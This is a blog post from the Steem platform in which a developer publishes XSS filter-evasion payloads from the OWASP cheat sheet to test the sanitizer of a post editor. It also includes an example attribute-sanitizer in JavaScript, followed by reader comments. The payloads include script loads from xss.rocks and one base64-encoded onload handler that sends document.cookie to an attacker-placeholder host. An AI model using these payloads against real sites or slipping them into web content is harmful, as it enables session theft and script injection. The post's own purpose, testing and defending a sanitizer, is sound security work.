Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet

in #steemworld, 5 years ago (edited)

This post acts as a public XSS Security Test for my upcoming Post Editor on SteemWorld. Of course, it can also be used to test many different XSS attacks against other platforms. If you see a popup message stating 'XSS' while viewing this post, the Steem platform you are using may not be secure and its developers need to be contacted immediately.

Since I recently finished the Sanitizer Module of my HTML Parser for the Editor, it's now time to test different scripting attacks, and I think it is a good idea to have a post that makes it easy to re-test any future changes. A few things might still be added in the next few days.

I've spent some time checking the official XSS Filter Evasion Cheat Sheet (last revision: 02/23/2019) and included the relevant attacks in this post.

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>


javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>


<IMG SRC="javascript:alert('XSS');">


<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>


<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>


<IMG SRC=javascript:alert(&quot;XSS&quot;)>


<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG SRC=javascript:alert("RSnake says, 'XSS'")>


<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG """>">


<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


<IMG SRC=# onmouseover="alert('xxs')">


<IMG SRC= onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">


<IMG onmouseover="alert('xxs')">


<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))">


<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">


<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=javascript:alert(
'XSS')>


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


<IMG SRC="jav   ascript:alert('XSS');">


<IMG SRC="jav&#x09;ascript:alert('XSS');">


<IMG SRC="jav&#x0A;ascript:alert('XSS');">


<IMG SRC="jav&#x0D;ascript:alert('XSS');">


<IMG SRC=" &#14;  javascript:alert('XSS');">


<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/XSS SRC="http://xss.rocks/xss.js">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/SRC="http://xss.rocks/xss.js">
<<SCRIPT>alert("XSS");//<</SCRIPT>

<


<SCRIPT SRC=http://xss.rocks/xss.js?< B >

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">


<IMG LOWSRC="javascript:alert('XSS')">


<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
• XSS

<IMG SRC='vbscript:msgbox("XSS")'>


<IMG SRC="livescript:[code]">


<svg/onload=alert('XSS')>

<svg/onload=alert('XSS')>


<BODY ONLOAD=alert('XSS')>

<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">


<BR SIZE="&{alert('XSS')}">


<LINK REL="stylesheet" HREF="javascript:alert('XSS');">


<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">


<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">


<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

exp/*


<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">


<XSS STYLE="behavior: url(xss.htc);">


¼script¾alert(¢XSS¢)¼/script¾

¼script¾alert(¢XSS¢)¼/script¾


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">


<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">


<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">


<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(Unsupported javascript:alert('XSS');)

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

(Unsupported #)

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>


<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>

<DIV STYLE="width: expression(alert('XSS'));"></DIV>

(html comment removed: [if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif])

(html comment removed: [if gte IE 4]>

<![endif])
<BASE HREF="javascript:alert('XSS');//">


<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID="xss"><I><B><IMG SRC="javas(html comment removed:  )cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>


<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">

If you are a developer and need help protecting your app against such attacks, feel free to leave me a message ;)
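As an added example (my own code, not SteemWorld's sanitizer, whose source is not on this page), here is a defender-side attribute check in JavaScript that covers the URL-scheme, entity-encoding, whitespace and event-handler evasions tested above; the entity table, the attribute and scheme allowlists and the sample values are assumptions of this example.

```javascript
// Added example, not SteemWorld's own sanitizer: a defender-side attribute check modelled on
// the evasions tested above (entities, embedded tab/newline/CR, mixed case, vbscript:/data:).
const NAMED = new Map([['quot', '"'], ['amp', '&'], ['lt', '<'], ['gt', '>'], ['apos', "'"],
  ['colon', ':'], ['tab', '\t'], ['newline', '\n']]);

// Decode decimal (&#106; or &#0000106), hex (&#x6A;) and a few named entities.
// The semicolon is optional, exactly as several of the payloads above rely on.
function decodeEntities(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] !== '#') return NAMED.get(body.toLowerCase()) ?? match;
    const hex = body[1].toLowerCase() === 'x';
    const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}
// Browsers ignore tabs, newlines, CR and other control characters inside a URL scheme
// ("jav\tascript:"), so strip them before classifying; only the verdict is used, not the probe.
function isSafeUrl(raw) {
  const probe = decodeEntities(raw).replace(/[\u0000-\u0020\u007f]/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(probe);
  if (!scheme) return true;                                   // relative URL or fragment
  return ['http', 'https', 'mailto'].includes(scheme[1].toLowerCase()); // allowlist: data:, vbscript: fail
}
// Attributes whose value is fetched or navigated to; the tests above abuse every one of them.
const URL_ATTRS = new Set(['src', 'href', 'background', 'dynsrc', 'lowsrc', 'data', 'action', 'formaction', 'poster']);
// Takes the { name: value } map a parser produced for one element and returns what may be kept.
// Allowlisting the tags themselves (no script/style/meta/base/object/embed) is a separate step.
function sanitizeAttributes(attrs) {
  const kept = Object.create(null);                           // no prototype, so "__proto__" cannot change it
  for (const [name, value] of Object.entries(attrs)) {
    const n = name.toLowerCase();
    if (n.startsWith('on') || n === 'style') continue;        // onerror=, onload!#$%...=, expression()
    if (URL_ATTRS.has(n) && !isSafeUrl(value)) continue;
    kept[n] = value;
  }
  return kept;
}

// Constructed samples (same categories as the payloads above) with the expected verdict.
const SAMPLES = [
  ["javascript:alert('XSS')", false], ["JaVaScRiPt:alert('XSS')", false],
  ["jav&#x09;ascript:alert('XSS');", false], [" &#14;  javascript:alert('XSS');", false],
  ["&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)", false],
  ['vbscript:msgbox("XSS")', false], ["data:text/html;base64,PHNjcmlwdD4=", false],
  ["https://steemworld.org/", true], ["/images/logo.png", true], ["#top", true],
];
// Returns the sample URLs whose verdict differs from the expectation (empty when all pass).
function failingSamples() {
  return SAMPLES.filter(([url, safe]) => isSafeUrl(url) !== safe).map(([url]) => url);
}
```

isSafeUrl only classifies: an attribute value is either kept verbatim or dropped, never rewritten, because a "cleaned" value still goes through the browser's own entity and whitespace handling.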

Just to be safe,



The first (technical) Chinese post I have scrolled through completely :))
but it could just as well be Klingon or Romulan!

Best regards

I don't completely understand it, but thank you for your work anyway! ;)

Posted using Partiko Android

Thanks for keeping us safe.

Yes, there must be proper security to ensure that the apps are safe.

This post has been included in the latest edition of SoS Daily News - a digest of all the latest news on the Steem blockchain.


Everything is okay! 👌


You received an automatic vote, because I believe in you and I love what you create! ;)

A huge hug from @amico! 🤗

I love promoting !sbi status

Hi @amico!

• you have 140 units and 510 bonus units
• your rshares balance is 2513443120490 or 1.556 $
• your next SBI upvote is predicted to be 0.311 $

Did you know Steem Basic Income has a Quality Policy?

On a completely different note . . . I've noticed that when I edit a post, if it has a self vote steemworld counts it again. Is it possible to make it so the vote only gets counted once? The way it works currently means my self vote level shows as higher than it truly is.

No idea how easy or not that is to do but thought I'd mention it.

Thanks for all the great work you do. 😊

I checked your self-vote rate and it seems to be correct. You created 7 posts and voted all of them with 100% (I couldn't even find an edited post). Since you only vote yourself and @artysteps (looks like another account of yours) with 100% and you vote all other accounts with 10-50%, I think your self-vote rate should in fact be much higher (at least 45%).

Keep in mind that some day you might get flagged heavily by some whales for that ;)

Hmmm. Ok. But I'm not sure why you can't see any edited posts; I definitely corrected a couple of spelling mistakes. Not important though. Thanks for checking.

You just rose by 20.17% upvote from @curationhelper courtesy of @der-prophet

This post has just been added as a new item to the timeline of SteemWorld on Steem Projects.

If you want to be notified about new updates from this project, register on Steem Projects and add SteemWorld to your favorite projects.

Hi @steemchiller!

Your post was upvoted by @steem-ua, new Steem dApp, using UserAuthority for algorithmic post curation!
Your UA account score is currently 6.244 which ranks you at #236 across all Steem accounts.
Your rank has improved 1 place in the last three days (old rank 237).

In our last Algorithmic Curation Round, consisting of 182 contributions, your post is ranked at #12.

Evaluation of your UA score:
• You've built up a nice network.
• The readers appreciate your great work!
• Good user engagement!

Feel free to join our @steem-ua Discord server
